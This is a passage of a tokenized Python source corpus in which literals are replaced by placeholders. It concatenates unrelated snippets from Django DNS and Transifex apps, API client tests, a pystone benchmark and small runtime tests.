domain_mega_filter | Q ( domain = domain ) <EOL> rdomain_mega_filter = Q ( reverse_domain = root_domain ) <EOL> for reverse_domain in domains : <EOL> rdomain_mega_filter = rdomain_mega_filter | Q ( <EOL> reverse_domain = reverse_domain ) <EOL> soa_data = render_soa_only ( soa = soa , root_domain = root_domain ) <EOL> try : <EOL> if ztype == "<STR_LIT>" : <EOL> view_data = render_forward_zone ( view , domain_mega_filter ) <EOL> else : <EOL> view_data = render_reverse_zone ( view , domain_mega_filter , <EOL> rdomain_mega_filter ) <EOL> except View . DoesNotExist : <EOL> view_data = "<STR_LIT>" <EOL> if view_data : <EOL> view_data = soa_data + view_data <EOL> return view_data </s>
<s> from mozdns . utils import slim_form <EOL> from base . base . views import BaseListView , BaseDetailView , BaseCreateView <EOL> from base . base . views import BaseUpdateView , BaseDeleteView <EOL> class MozdnsListView ( BaseListView ) : <EOL> """<STR_LIT:U+0020>""" <EOL> template_name = '<STR_LIT>' <EOL> class MozdnsDetailView ( BaseDetailView ) : <EOL> """<STR_LIT:U+0020>""" <EOL> template_name = '<STR_LIT>' <EOL> class MozdnsCreateView ( BaseCreateView ) : <EOL> """<STR_LIT:U+0020>""" <EOL> template_name = '<STR_LIT>' <EOL> def get_form ( self , form_class ) : <EOL> form = super ( MozdnsCreateView , self ) . get_form ( form_class ) <EOL> domain_pk = self . kwargs . get ( '<STR_LIT>' , False ) <EOL> if domain_pk : <EOL> form = slim_form ( domain_pk = domain_pk , form = form ) <EOL> reverse_domain_pk = self . kwargs . get ( '<STR_LIT>' , False ) <EOL> if reverse_domain_pk : <EOL> slim_form ( reverse_domain_pk = reverse_domain_pk , form = form ) <EOL> """<STR_LIT>""" <EOL> remove_message = unicode ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> for field in form . fields : <EOL> if field in form . base_fields : <EOL> if form . base_fields [ field ] . help_text : <EOL> new_text = form . base_fields [ field ] . help_text . replace ( <EOL> remove_message , '<STR_LIT>' ) <EOL> new_text = new_text . strip ( ) <EOL> form . base_fields [ field ] . help_text = new_text <EOL> return form <EOL> class MozdnsUpdateView ( BaseUpdateView ) : <EOL> template_name = '<STR_LIT>' <EOL> def get_form ( self , form_class ) : <EOL> form = super ( MozdnsUpdateView , self ) . get_form ( form_class ) <EOL> """<STR_LIT>""" <EOL> remove_message = unicode ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> for field in form . fields : <EOL> if field in form . base_fields : <EOL> if form . base_fields [ field ] . help_text : <EOL> new_text = form . base_fields [ field ] . help_text . replace ( <EOL> remove_message , '<STR_LIT>' ) <EOL> new_text = new_text . strip ( ) <EOL> form . base_fields [ field ] . help_text = new_text <EOL> return form <EOL> class MozdnsDeleteView ( BaseDeleteView ) : <EOL> """<STR_LIT:U+0020>""" <EOL> template_name = '<STR_LIT>' <EOL> succcess_url = '<STR_LIT>' </s>
<s> """<STR_LIT:U+0020>""" <EOL> __version__ = '<STR_LIT>' <EOL> setproctitle = lambda v : NotImplemented <EOL> try : <EOL> from setproctitle import setproctitle <EOL> except ImportError : <EOL> try : <EOL> from procname import setprocname as setproctitle <EOL> except ImportError : <EOL> pass </s>
<s> if __name__ == '<STR_LIT:__main__>' : <EOL> import nose <EOL> try : <EOL> import rednose <EOL> except ImportError : <EOL> argv = None <EOL> else : <EOL> argv = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> nose . main ( argv = argv ) </s>
<s> __version__ = '<STR_LIT>' </s>
<s> import unittest <EOL> import mock <EOL> import json <EOL> import runabove <EOL> class TestToken ( unittest . TestCase ) : <EOL> answer_token = '''<STR_LIT>''' <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def setUp ( self , mock_wrapper ) : <EOL> self . mock_wrapper = mock_wrapper <EOL> self . token = runabove . token . TokenManager ( mock_wrapper , None ) <EOL> def test_base_path ( self ) : <EOL> self . assertEquals ( self . token . basepath , '<STR_LIT>' ) <EOL> def test_token_existance ( self ) : <EOL> self . mock_wrapper . get . return_value = json . loads ( self . answer_token ) <EOL> token = self . token . get ( ) <EOL> self . assertIsInstance ( token , runabove . token . Token ) <EOL> class TestTokenObject ( unittest . TestCase ) : <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def setUp ( self , mock_tokens ) : <EOL> self . mock_tokens = mock_tokens <EOL> mock_token = json . loads ( TestToken . answer_token ) <EOL> self . token = runabove . token . Token ( <EOL> self . mock_tokens , <EOL> mock_token [ '<STR_LIT>' ] , <EOL> mock_token [ '<STR_LIT>' ] [ '<STR_LIT:user>' ] , <EOL> mock_token [ '<STR_LIT>' ] [ '<STR_LIT>' ] , <EOL> mock_token [ '<STR_LIT>' ] [ '<STR_LIT>' ] , <EOL> mock_token [ '<STR_LIT>' ] [ '<STR_LIT>' ] , <EOL> mock_token [ '<STR_LIT>' ] [ '<STR_LIT>' ] , <EOL> mock_token [ '<STR_LIT>' ] [ '<STR_LIT>' ] , <EOL> mock_token [ '<STR_LIT>' ] [ '<STR_LIT>' ] , <EOL> ) <EOL> def test_init ( self ) : <EOL> mock_token = json . loads ( TestToken . answer_token ) <EOL> self . assertEqual ( mock_token [ '<STR_LIT>' ] , self . token . auth_token ) <EOL> self . assertEqual ( mock_token [ '<STR_LIT>' ] [ '<STR_LIT:user>' ] , self . token . user ) <EOL> self . assertEqual ( mock_token [ '<STR_LIT>' ] [ '<STR_LIT>' ] , self . token . roles ) <EOL> self . assertEqual ( mock_token [ '<STR_LIT>' ] [ '<STR_LIT>' ] , self . token . project ) <EOL> self . assertEqual ( mock_token [ '<STR_LIT>' ] [ '<STR_LIT>' ] , self . token . catalog ) <EOL> self . assertEqual ( mock_token [ '<STR_LIT>' ] [ '<STR_LIT>' ] , self . token . methods ) <EOL> self . assertEqual ( mock_token [ '<STR_LIT>' ] [ '<STR_LIT>' ] , self . token . issued_at ) <EOL> self . assertEqual ( mock_token [ '<STR_LIT>' ] [ '<STR_LIT>' ] , self . token . expires_at ) <EOL> def test_get_endpoint ( self ) : <EOL> mock_token = json . loads ( TestToken . answer_token ) <EOL> self . assertEqual ( <EOL> mock_token [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ <NUM_LIT:0> ] [ '<STR_LIT>' ] [ <NUM_LIT:1> ] , <EOL> self . token . get_endpoint ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> ) <EOL> self . assertRaises ( KeyError , self . token . get_endpoint , '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . assertRaises ( KeyError , self . token . get_endpoint , '<STR_LIT>' , '<STR_LIT>' ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> unittest . main ( ) </s>
<s> '''<STR_LIT>''' <EOL> from time import clock <EOL> __version__ = "<STR_LIT>" <EOL> from runtime import * <EOL> def main ( ) : <EOL> LOOPS = <NUM_LIT> <EOL> a = pystones ( LOOPS ) <EOL> benchtime = a [ <NUM_LIT:0> ] <EOL> stones = a [ <NUM_LIT:1> ] <EOL> print ( stones ) <EOL> def pystones ( loops ) : <EOL> return Proc0 ( loops ) <EOL> class Record : <EOL> def __init__ ( self , PtrComp = None , Discr = <NUM_LIT:0> , EnumComp = <NUM_LIT:0> , IntComp = <NUM_LIT:0> , StringComp = <NUM_LIT:0> ) : <EOL> self . PtrComp = PtrComp <EOL> self . Discr = Discr <EOL> self . EnumComp = EnumComp <EOL> self . IntComp = IntComp <EOL> self . StringComp = StringComp <EOL> def copy ( self ) : <EOL> return Record ( <EOL> PtrComp = self . PtrComp , <EOL> Discr = self . Discr , <EOL> EnumComp = self . EnumComp , <EOL> IntComp = self . IntComp , <EOL> StringComp = self . StringComp <EOL> ) <EOL> TRUE = <NUM_LIT:1> <EOL> FALSE = <NUM_LIT:0> <EOL> IntGlob = <NUM_LIT:0> <EOL> BoolGlob = FALSE <EOL> Char1Glob = '<STR_LIT>' <EOL> Char2Glob = '<STR_LIT>' <EOL> PtrGlb = None <EOL> PtrGlbNext = None <EOL> Ident1 = <NUM_LIT:1> <EOL> Ident2 = <NUM_LIT:2> <EOL> Ident3 = <NUM_LIT:3> <EOL> Ident4 = <NUM_LIT:4> <EOL> Ident5 = <NUM_LIT:5> <EOL> def create_array2glob ( n ) : <EOL> return [ Array1Glob [ : ] for i in range ( n ) ] <EOL> Array1Glob = [ <NUM_LIT:0> ] * <NUM_LIT> <EOL> Array2Glob = create_array2glob ( <NUM_LIT> ) <EOL> def Proc0 ( loops ) : <EOL> global IntGlob <EOL> global BoolGlob <EOL> global Char1Glob <EOL> global Char2Glob <EOL> global Array1Glob <EOL> global Array2Glob <EOL> global PtrGlb <EOL> global PtrGlbNext <EOL> starttime = clock ( ) <EOL> PtrGlbNext = Record ( PtrComp = None , Discr = <NUM_LIT:0> , EnumComp = <NUM_LIT:0> , IntComp = <NUM_LIT:0> , StringComp = <NUM_LIT:0> ) <EOL> PtrGlb = Record ( <EOL> PtrComp = PtrGlbNext , <EOL> Discr = Ident1 , <EOL> EnumComp = Ident3 , <EOL> IntComp = <NUM_LIT> , <EOL> StringComp = "<STR_LIT>" <EOL> ) <EOL> String1Loc = "<STR_LIT>" <EOL> Array2Glob [ <NUM_LIT:8> ] [ <NUM_LIT:7> ] = <NUM_LIT:10> <EOL> for i in range ( loops ) : <EOL> Proc5 ( ) <EOL> Proc4 ( ) <EOL> IntLoc1 = <NUM_LIT:2> <EOL> IntLoc2 = <NUM_LIT:3> <EOL> String2Loc = "<STR_LIT>" <EOL> EnumLoc = Ident2 <EOL> BoolGlob = not Func2 ( String1Loc , String2Loc ) <EOL> while IntLoc1 < IntLoc2 : <EOL> IntLoc3 = <NUM_LIT:5> * IntLoc1 - IntLoc2 <EOL> IntLoc3 = Proc7 ( IntLoc1 , IntLoc2 ) <EOL> IntLoc1 = IntLoc1 + <NUM_LIT:1> <EOL> Proc8 ( Array1Glob , Array2Glob , IntLoc1 , IntLoc3 ) <EOL> PtrGlb = Proc1 ( PtrGlb ) <EOL> CharIndex = '<STR_LIT:A>' <EOL> while CharIndex <= Char2Glob : <EOL> if EnumLoc == Func1 ( CharIndex , '<STR_LIT:C>' ) : <EOL> EnumLoc = Proc6 ( Ident1 ) <EOL> CharIndex = chr ( ord ( CharIndex ) + <NUM_LIT:1> ) <EOL> IntLoc3 = IntLoc2 * IntLoc1 <EOL> IntLoc2 = IntLoc3 / IntLoc1 <EOL> IntLoc2 = <NUM_LIT:7> * ( IntLoc3 - IntLoc2 ) - IntLoc1 <EOL> IntLoc1 = Proc2 ( IntLoc1 ) <EOL> benchtime = clock ( ) - starttime <EOL> if benchtime == <NUM_LIT:0.0> : <EOL> loopsPerBenchtime = <NUM_LIT:0.0> <EOL> else : <EOL> loopsPerBenchtime = ( loops / benchtime ) <EOL> return benchtime , loopsPerBenchtime <EOL> def Proc1 ( PtrParIn ) : <EOL> NextRecord = PtrGlb . copy ( ) <EOL> PtrParIn . PtrComp = NextRecord <EOL> PtrParIn . IntComp = <NUM_LIT:5> <EOL> NextRecord . IntComp = PtrParIn . IntComp <EOL> NextRecord . PtrComp = PtrParIn . PtrComp <EOL> NextRecord . PtrComp = Proc3 ( NextRecord . PtrComp ) <EOL> if NextRecord . Discr == Ident1 : <EOL> NextRecord . IntComp = <NUM_LIT:6> <EOL> NextRecord . EnumComp = Proc6 ( PtrParIn . EnumComp ) <EOL> NextRecord . PtrComp = PtrGlb . PtrComp <EOL> NextRecord . IntComp = Proc7 ( NextRecord . IntComp , <NUM_LIT:10> ) <EOL> else : <EOL> PtrParIn = NextRecord . copy ( ) <EOL> NextRecord . PtrComp = None <EOL> return PtrParIn <EOL> def Proc2 ( IntParIO ) : <EOL> IntLoc = IntParIO + <NUM_LIT:10> <EOL> while True : <EOL> if Char1Glob == '<STR_LIT:A>' : <EOL> IntLoc = IntLoc - <NUM_LIT:1> <EOL> IntParIO = IntLoc - IntGlob <EOL> EnumLoc = Ident1 <EOL> if EnumLoc == Ident1 : <EOL> break <EOL> return IntParIO <EOL> def Proc3 ( PtrParOut ) : <EOL> global IntGlob <EOL> if PtrGlb is not None : <EOL> PtrParOut = PtrGlb . PtrComp <EOL> else : <EOL> IntGlob = <NUM_LIT:100> <EOL> PtrGlb . IntComp = Proc7 ( <NUM_LIT:10> , IntGlob ) <EOL> return PtrParOut <EOL> def Proc4 ( ) : <EOL> global Char2Glob <EOL> BoolLoc = Char1Glob == '<STR_LIT:A>' <EOL> BoolLoc = BoolLoc or BoolGlob <EOL> Char2Glob = '<STR_LIT:B>' <EOL> def Proc5 ( ) : <EOL> global Char1Glob <EOL> global BoolGlob <EOL> Char1Glob = '<STR_LIT:A>' <EOL> BoolGlob = FALSE <EOL> def Proc6 ( EnumParIn ) : <EOL> EnumParOut = EnumParIn <EOL> if not Func3 ( EnumParIn ) : <EOL> EnumParOut = Ident4 <EOL> if EnumParIn == Ident1 : <EOL> EnumParOut = Ident1 <EOL> elif EnumParIn == Ident2 : <EOL> if IntGlob > <NUM_LIT:100> : <EOL> EnumParOut = Ident1 <EOL> else : <EOL> EnumParOut = Ident4 <EOL> elif EnumParIn == Ident3 : <EOL> EnumParOut = Ident2 <EOL> elif EnumParIn == Ident4 : <EOL> pass <EOL> elif EnumParIn == Ident5 : <EOL> EnumParOut = Ident3 <EOL> return EnumParOut <EOL> def Proc7 ( IntParI1 , IntParI2 ) : <EOL> IntLoc = IntParI1 + <NUM_LIT:2> <EOL> IntParOut = IntParI2 + IntLoc <EOL> return IntParOut <EOL> def Proc8 ( Array1Par , Array2Par , IntParI1 , IntParI2 ) : <EOL> global IntGlob <EOL> IntLoc = IntParI1 + <NUM_LIT:5> <EOL> Array1Par [ IntLoc ] = IntParI2 <EOL> Array1Par [ IntLoc + <NUM_LIT:1> ] = Array1Par [ IntLoc ] <EOL> Array1Par [ IntLoc + <NUM_LIT:30> ] = IntLoc <EOL> for IntIndex in range ( IntLoc , IntLoc + <NUM_LIT:2> ) : <EOL> Array2Par [ IntLoc ] [ IntIndex ] = IntLoc <EOL> Array2Par [ IntLoc ] [ IntLoc - <NUM_LIT:1> ] = Array2Par [ IntLoc ] [ IntLoc - <NUM_LIT:1> ] + <NUM_LIT:1> <EOL> Array2Par [ IntLoc + <NUM_LIT:20> ] [ IntLoc ] = Array1Par [ IntLoc ] <EOL> IntGlob = <NUM_LIT:5> <EOL> def Func1 ( CharPar1 , CharPar2 ) : <EOL> CharLoc1 = CharPar1 <EOL> CharLoc2 = CharLoc1 <EOL> if CharLoc2 != CharPar2 : <EOL> return Ident1 <EOL> else : <EOL> return Ident2 <EOL> def Func2 ( StrParI1 , StrParI2 ) : <EOL> IntLoc = <NUM_LIT:1> <EOL> while IntLoc <= <NUM_LIT:1> : <EOL> if Func1 ( StrParI1 [ IntLoc ] , StrParI2 [ IntLoc + <NUM_LIT:1> ] ) == Ident1 : <EOL> CharLoc = '<STR_LIT:A>' <EOL> IntLoc = IntLoc + <NUM_LIT:1> <EOL> if CharLoc >= '<STR_LIT>' and CharLoc <= '<STR_LIT>' : <EOL> IntLoc = <NUM_LIT:7> <EOL> if CharLoc == '<STR_LIT:X>' : <EOL> return TRUE <EOL> else : <EOL> if StrParI1 > StrParI2 : <EOL> IntLoc = IntLoc + <NUM_LIT:7> <EOL> return TRUE <EOL> else : <EOL> return FALSE <EOL> def Func3 ( EnumParIn ) : <EOL> EnumLoc = EnumParIn <EOL> if EnumLoc == Ident3 : return TRUE <EOL> return FALSE <EOL> main ( ) </s>
<s> from runtime import * <EOL> """<STR_LIT>""" <EOL> def main ( ) : <EOL> a = { '<STR_LIT:foo>' : '<STR_LIT:bar>' } <EOL> keys = a . keys ( ) <EOL> assert ( '<STR_LIT:foo>' in keys ) <EOL> print '<STR_LIT>' <EOL> print a <EOL> for key in iter ( a ) : <EOL> print key <EOL> print a [ key ] <EOL> main ( ) </s>
<s> from runtime import * <EOL> '''<STR_LIT>''' <EOL> def main ( ) : <EOL> d = { '<STR_LIT:x>' : <NUM_LIT:1> } <EOL> a = '<STR_LIT:x>' in d <EOL> assert ( a == True ) <EOL> b = '<STR_LIT:y>' in d <EOL> assert ( b == False ) <EOL> main ( ) </s>
<s> from runtime import * <EOL> '''<STR_LIT>''' <EOL> def main ( ) : <EOL> a = range ( <NUM_LIT:10> ) <EOL> assert ( a [ <NUM_LIT:0> ] == <NUM_LIT:0> ) <EOL> assert ( a [ <NUM_LIT:1> ] == <NUM_LIT:1> ) <EOL> assert ( len ( a ) == <NUM_LIT:10> ) <EOL> b = range ( <NUM_LIT:1> , <NUM_LIT:10> ) <EOL> assert ( b [ <NUM_LIT:0> ] == <NUM_LIT:1> ) <EOL> assert ( b [ <NUM_LIT:1> ] == <NUM_LIT:2> ) <EOL> assert ( len ( b ) == <NUM_LIT:9> ) <EOL> c = <NUM_LIT:0> <EOL> for i in range ( <NUM_LIT:10> ) : <EOL> c += <NUM_LIT:1> <EOL> assert ( c == <NUM_LIT:10> ) <EOL> d = <NUM_LIT:0> <EOL> for i in range ( <NUM_LIT:1> , <NUM_LIT:10> ) : <EOL> d += <NUM_LIT:1> <EOL> assert ( d == <NUM_LIT:9> ) <EOL> e = <NUM_LIT:0> <EOL> for i in range ( <NUM_LIT:1> , <NUM_LIT:8> + <NUM_LIT:2> ) : <EOL> e += <NUM_LIT:1> <EOL> assert ( e == <NUM_LIT:9> ) <EOL> main ( ) </s>
<s> import os , sys , subprocess <EOL> passed = { } <EOL> ignore = ( ) <EOL> TODO_FIX = ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ) <EOL> files = os . listdir ( '<STR_LIT>' ) <EOL> files . reverse ( ) <EOL> for md in files : <EOL> if md in TODO_FIX : <EOL> print '<STR_LIT>' % md <EOL> continue <EOL> elif not md . endswith ( '<STR_LIT>' ) : <EOL> continue <EOL> print md <EOL> if md . startswith ( ignore ) : <EOL> continue <EOL> subprocess . check_call ( [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> os . path . join ( '<STR_LIT>' , md ) <EOL> ] ) <EOL> passed [ md ] = open ( '<STR_LIT>' ) . read ( ) . split ( '<STR_LIT>' ) [ - <NUM_LIT:1> ] <EOL> print '<STR_LIT>' <EOL> report = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] <EOL> for md in passed : <EOL> print md <EOL> report . append ( '<STR_LIT>' % ( md , md ) ) <EOL> report . append ( '<STR_LIT>' ) <EOL> report . append ( '<STR_LIT>' ) <EOL> report . append ( '<STR_LIT>' ) <EOL> report . append ( '<STR_LIT>' ) <EOL> report . extend ( open ( '<STR_LIT>' + md , '<STR_LIT:rb>' ) . read ( ) . splitlines ( ) ) <EOL> report . append ( '<STR_LIT>' ) <EOL> report . append ( '<STR_LIT>' ) <EOL> report . append ( '<STR_LIT>' ) <EOL> report . append ( '<STR_LIT>' ) <EOL> report . extend ( passed [ md ] . splitlines ( ) ) <EOL> report . append ( '<STR_LIT>' ) <EOL> open ( '<STR_LIT>' , '<STR_LIT:wb>' ) . write ( '<STR_LIT:\n>' . join ( report ) ) </s>
<s> from django import template <EOL> from actionlog . models import LogEntry <EOL> register = template . Library ( ) <EOL> class LogNode ( template . Node ) : <EOL> def __init__ ( self , limit , varname , user = None , object = None , log_type = '<STR_LIT>' ) : <EOL> self . limit , self . varname , self . object , self . user = ( limit , varname , <EOL> object , user ) <EOL> self . log_type = log_type <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" <EOL> def render ( self , context ) : <EOL> if self . user is not None : <EOL> user = template . Variable ( self . user ) . resolve ( context ) <EOL> if self . log_type and self . log_type == '<STR_LIT>' : <EOL> query = LogEntry . objects . by_user_and_public_projects ( user ) <EOL> else : <EOL> query = LogEntry . objects . by_user ( user ) <EOL> elif self . object is not None : <EOL> obj = template . Variable ( self . object ) . resolve ( context ) <EOL> query = LogEntry . objects . by_object ( obj ) <EOL> context [ self . varname ] = query [ : self . limit ] <EOL> return '<STR_LIT>' <EOL> class DoGetLog : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , tag_name ) : <EOL> self . tag_name = tag_name <EOL> def __call__ ( self , parser , token ) : <EOL> tokens = token . contents . split ( ) <EOL> if len ( tokens ) < <NUM_LIT:4> : <EOL> raise template . TemplateSyntaxError , ( <EOL> "<STR_LIT>" % self . tag_name ) <EOL> if not tokens [ <NUM_LIT:1> ] . isdigit ( ) : <EOL> raise template . TemplateSyntaxError , ( <EOL> "<STR_LIT>" % self . tag_name ) <EOL> if tokens [ <NUM_LIT:2> ] != '<STR_LIT>' : <EOL> raise template . TemplateSyntaxError , ( <EOL> "<STR_LIT>" % self . tag_name ) <EOL> if len ( tokens ) > <NUM_LIT:4> : <EOL> if tokens [ <NUM_LIT:4> ] == '<STR_LIT>' : <EOL> return LogNode ( limit = tokens [ <NUM_LIT:1> ] , varname = tokens [ <NUM_LIT:3> ] , <EOL> user = ( len ( tokens ) > <NUM_LIT:5> and tokens [ <NUM_LIT:5> ] or None ) , <EOL> log_type = self . tag_name ) <EOL> elif tokens [ <NUM_LIT:4> ] == '<STR_LIT>' : <EOL> return LogNode ( limit = tokens [ <NUM_LIT:1> ] , varname = tokens [ <NUM_LIT:3> ] , <EOL> object = ( len ( tokens ) > <NUM_LIT:5> and tokens [ <NUM_LIT:5> ] or None ) , <EOL> log_type = self . tag_name ) <EOL> else : <EOL> raise template . TemplateSyntaxError , ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" % self . tag_name ) <EOL> register . tag ( '<STR_LIT>' , DoGetLog ( '<STR_LIT>' ) ) <EOL> register . tag ( '<STR_LIT>' , DoGetLog ( '<STR_LIT>' ) ) </s>
<s> from django . test import TestCase <EOL> from datastores import TxRedisMapper <EOL> from transifex . txcommon . log import logger <EOL> class TestRedis ( TestCase ) : <EOL> def setUp ( self ) : <EOL> logger . critical ( "<STR_LIT>" ) <EOL> self . r = TxRedisMapper ( db = <NUM_LIT:1> ) <EOL> def tearDown ( self ) : <EOL> self . r . flushdb ( ) <EOL> def test_json_suffix ( self ) : <EOL> key = '<STR_LIT:key>' <EOL> data = { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT:code>' : '<STR_LIT>' } <EOL> res = self . r . lpush ( key , data = data ) <EOL> self . assertEquals ( res , <NUM_LIT:1> ) <EOL> res = self . r . lpop ( key ) <EOL> self . assertEquals ( res , data ) </s>
<s> from django . conf import settings <EOL> from django . db . models import get_model <EOL> from django . template import Library <EOL> from django . contrib . auth . models import AnonymousUser <EOL> Lock = get_model ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> register = Library ( ) <EOL> @ register . inclusion_tag ( '<STR_LIT>' , takes_context = True ) <EOL> def lock_resource_action ( context , resource , language ) : <EOL> """<STR_LIT>""" <EOL> request = context [ '<STR_LIT>' ] <EOL> user = request . user <EOL> lock = Lock . objects . get_or_none ( resource , language ) <EOL> if request . user in ( None , AnonymousUser ( ) ) : <EOL> context [ '<STR_LIT>' ] = False <EOL> else : <EOL> context [ '<STR_LIT>' ] = Lock . can_lock ( resource , language , user ) <EOL> if lock : <EOL> if not lock . valid ( ) : <EOL> lock . delete ( ) <EOL> context [ '<STR_LIT>' ] = False <EOL> else : <EOL> context [ '<STR_LIT>' ] = lock <EOL> context [ '<STR_LIT>' ] = lock . can_unlock ( user ) <EOL> context [ '<STR_LIT>' ] = True <EOL> context [ '<STR_LIT>' ] = ( lock . owner == user ) <EOL> else : <EOL> context [ '<STR_LIT>' ] = False <EOL> context [ '<STR_LIT>' ] = resource <EOL> context [ '<STR_LIT>' ] = language <EOL> context [ '<STR_LIT>' ] = settings . LOCKS_LIFETIME / <NUM_LIT> <EOL> context [ '<STR_LIT>' ] = '<STR_LIT>' % ( resource . id , language . id ) <EOL> context [ '<STR_LIT>' ] = request . META . get ( '<STR_LIT>' , None ) or '<STR_LIT:/>' <EOL> return context </s>
<s> from django . conf . urls . defaults import * <EOL> from views import project_toggle_watch , resource_translation_toggle_watch <EOL> urlpatterns = patterns ( '<STR_LIT>' , <EOL> url ( <EOL> regex = '<STR_LIT>' , <EOL> view = project_toggle_watch , <EOL> name = '<STR_LIT>' , ) , <EOL> url ( <EOL> regex = '<STR_LIT>' , <EOL> view = resource_translation_toggle_watch , <EOL> name = '<STR_LIT>' , ) , <EOL> ) </s>
<s> from datetime import datetime <EOL> from django . contrib import admin <EOL> from django . db import models <EOL> from django . db . models import permalink , get_model <EOL> from django . core . cache import cache <EOL> from django . http import Http404 <EOL> from django . utils . translation import ugettext_lazy as _ <EOL> from django . contrib . contenttypes . models import ContentType <EOL> from django . contrib . contenttypes import generic <EOL> class LanguageManager ( models . Manager ) : <EOL> def by_code_or_alias ( self , code ) : <EOL> """<STR_LIT>""" <EOL> if not code : <EOL> raise Language . DoesNotExist ( "<STR_LIT>" ) <EOL> lang = cache . get ( '<STR_LIT>' % code , None ) <EOL> if lang is None : <EOL> lang = Language . objects . get ( <EOL> models . Q ( code = code ) | <EOL> models . Q ( code_aliases__contains = '<STR_LIT>' % code ) <EOL> ) <EOL> cache . set ( '<STR_LIT>' % code , lang ) <EOL> return lang <EOL> def by_code_or_alias_or_none ( self , code ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> return self . by_code_or_alias ( code ) <EOL> except Language . DoesNotExist : <EOL> return None <EOL> def by_code_or_alias_or_404 ( self , code ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> return self . by_code_or_alias ( code ) <EOL> except Language . DoesNotExist : <EOL> raise Http404 <EOL> class Language ( models . Model ) : <EOL> """<STR_LIT>""" <EOL> nplural_choices = ( ( <NUM_LIT:0> , u'<STR_LIT>' ) , ( <NUM_LIT:1> , <NUM_LIT:1> ) , ( <NUM_LIT:2> , <NUM_LIT:2> ) , ( <NUM_LIT:3> , <NUM_LIT:3> ) , ( <NUM_LIT:4> , <NUM_LIT:4> ) , ( <NUM_LIT:5> , <NUM_LIT:5> ) , ( <NUM_LIT:6> , <NUM_LIT:6> ) ) <EOL> name = models . CharField ( _ ( '<STR_LIT:Name>' ) , unique = True , max_length = <NUM_LIT:50> , <EOL> help_text = "<STR_LIT>" ) <EOL> description = models . CharField ( _ ( '<STR_LIT>' ) , blank = True , max_length = <NUM_LIT:255> ) <EOL> code = models . CharField ( _ ( '<STR_LIT>' ) , unique = True , max_length = <NUM_LIT:50> , <EOL> help_text = ( "<STR_LIT>" <EOL> "<STR_LIT>" ) ) <EOL> code_aliases = models . CharField ( _ ( '<STR_LIT>' ) , max_length = <NUM_LIT:100> , <EOL> help_text = ( "<STR_LIT>" ) , <EOL> null = True , blank = True , default = '<STR_LIT>' ) <EOL> specialchars = models . CharField ( _ ( "<STR_LIT>" ) , max_length = <NUM_LIT:255> , <EOL> help_text = _ ( "<STR_LIT>" <EOL> "<STR_LIT>" ) , <EOL> blank = True ) <EOL> nplurals = models . SmallIntegerField ( _ ( "<STR_LIT>" ) , default = <NUM_LIT:0> , <EOL> choices = nplural_choices ) <EOL> pluralequation = models . CharField ( _ ( "<STR_LIT>" ) , max_length = <NUM_LIT:255> , <EOL> blank = True ) <EOL> rule_zero = models . CharField ( _ ( "<STR_LIT>" ) , max_length = <NUM_LIT:255> , <EOL> blank = True , null = True ) <EOL> rule_one = models . CharField ( _ ( "<STR_LIT>" ) , max_length = <NUM_LIT:255> , <EOL> blank = True , null = True ) <EOL> rule_two = models . CharField ( _ ( "<STR_LIT>" ) , max_length = <NUM_LIT:255> , <EOL> blank = True , null = True ) <EOL> rule_few = models . CharField ( _ ( "<STR_LIT>" ) , max_length = <NUM_LIT:255> , <EOL> blank = True , null = True ) <EOL> rule_many = models . CharField ( _ ( "<STR_LIT>" ) , max_length = <NUM_LIT:255> , <EOL> blank = True , null = True ) <EOL> rule_other = models . CharField ( _ ( "<STR_LIT>" ) , max_length = <NUM_LIT:255> , <EOL> blank = False , null = False , default = "<STR_LIT>" ) <EOL> objects = LanguageManager ( ) <EOL> def __unicode__ ( self ) : <EOL> return u'<STR_LIT>' % ( self . name , self . code ) <EOL> class Meta : <EOL> verbose_name = _ ( '<STR_LIT>' ) <EOL> verbose_name_plural = _ ( '<STR_LIT>' ) <EOL> db_table = '<STR_LIT>' <EOL> ordering = ( '<STR_LIT:name>' , ) <EOL> def save ( self , * args , ** kwargs ) : <EOL> if not self . code_aliases . startswith ( '<STR_LIT:U+0020>' ) : <EOL> self . code_aliases = '<STR_LIT>' % self . code_aliases <EOL> if not self . code_aliases . endswith ( '<STR_LIT:U+0020>' ) : <EOL> self . code_aliases = '<STR_LIT>' % self . code_aliases <EOL> super ( Language , self ) . save ( * args , ** kwargs ) <EOL> def get_rule_name_from_num ( self , num ) : <EOL> if num == <NUM_LIT:0> : <EOL> return '<STR_LIT>' <EOL> elif num == <NUM_LIT:1> : <EOL> return '<STR_LIT>' <EOL> elif num == <NUM_LIT:2> : <EOL> return '<STR_LIT>' <EOL> elif num == <NUM_LIT:3> : <EOL> return '<STR_LIT>' <EOL> elif num == <NUM_LIT:4> : <EOL> return '<STR_LIT>' <EOL> elif num == <NUM_LIT:5> : <EOL> return '<STR_LIT>' <EOL> def get_rule_num_from_name ( self , name ) : <EOL> if name == '<STR_LIT>' : <EOL> return <NUM_LIT:0> <EOL> elif name == '<STR_LIT>' : <EOL> return <NUM_LIT:1> <EOL> elif name == '<STR_LIT>' : <EOL> return <NUM_LIT:2> <EOL> elif name == '<STR_LIT>' : <EOL> return <NUM_LIT:3> <EOL> elif name == '<STR_LIT>' : <EOL> return <NUM_LIT:4> <EOL> elif name == '<STR_LIT>' : <EOL> return <NUM_LIT:5> <EOL> def get_pluralrules ( self ) : <EOL> rules = [ ] <EOL> if self . rule_zero : <EOL> rules . append ( '<STR_LIT>' ) <EOL> if self . rule_one : 